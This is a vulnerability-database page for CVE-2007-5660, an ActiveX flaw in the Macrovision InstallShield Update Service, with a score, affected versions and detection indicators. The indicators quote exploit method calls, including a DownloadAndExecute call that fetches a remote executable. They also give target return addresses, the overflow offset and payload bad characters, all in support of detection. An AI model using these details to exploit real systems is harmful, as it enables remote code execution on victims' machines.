cbcvebase.
CVE-2007-5660
published 2007-11-02

CVE-2007-5660: Unspecified vulnerability in the Update Service ActiveX control in isusweb.dll before 6.0.100.65101 in MacroVision FLEXnet Connect and InstallShield 2008…

PriorityP353critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
36.62%
98.3th percentile
Unspecified vulnerability in the Update Service ActiveX control in isusweb.dll before 6.0.100.65101 in MacroVision FLEXnet Connect and InstallShield 2008 allows remote attackers to execute arbitrary code via an unspecified "unsafe method," possibly involving a buffer overflow.

Affected

5 ranges
VendorProductVersion rangeFixed in
macrovisionupdate_service
macrovisionupdate_service
macrovisionupdate_service
macrovisionupdate_service
macrovisionupdate_service

Detection & IOCsextracted from sources · hover to see the quote

commandDownloadAndExecute("", <overly_long_ProductCode_string>, 0, "", "");
otherIsusweb.dll 6.0.100.54472
other0x71aa32ad
other0x75022ac4
commandDownloadAndExecute("","",1,"<payload_url>/<exe>.exe","");
commandDownloadAndInstall("True");
  • Detect exploitation attempts targeting the DownloadAndExecute method of the Macrovision InstallShield Update Service ActiveX control with an overly long second argument (ProductCode, offset 600 bytes) delivered via a browser HTML page.
  • Monitor for ActiveX instantiation of the Macrovision InstallShield Update Service control (Isusweb.dll) in browser processes, especially when followed by calls to DownloadAndExecute or DownloadAndInstall methods.
  • Flag network traffic where a browser fetches an HTML page containing both DownloadAndExecute and DownloadAndInstall JavaScript method calls referencing a remote .exe URL, consistent with the unsafe-method exploit delivery.
  • Bad characters for payload encoding are null byte, tab, newline, carriage return, single quote, and backslash — payloads avoiding these characters should be flagged in memory/network inspection.
  • Return address 0x71aa32ad is used for Windows XP SP0/SP1 Pro English targets; presence of this value at offset 600 in a string passed to DownloadAndExecute is a strong exploit indicator.
  • Return address 0x75022ac4 is used for Windows 2000 Pro English targets; presence of this value at offset 600 in a string passed to DownloadAndExecute is a strong exploit indicator.
  • ·The buffer overflow exploit targets a specific DLL version; patched or different versions of Isusweb.dll may not be vulnerable or may require different offsets/return addresses.
  • ·The Metasploit module uses randomized variable and executable names (rand_text_alpha) for the HTML delivery page, so static string-based signatures on variable names will be evaded.
  • ·The unsafe-method module (CVE-2007-5660) is distinct from the buffer overflow module (also referencing CVE-2007-5660); both exploit different attack vectors against the same ActiveX control.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.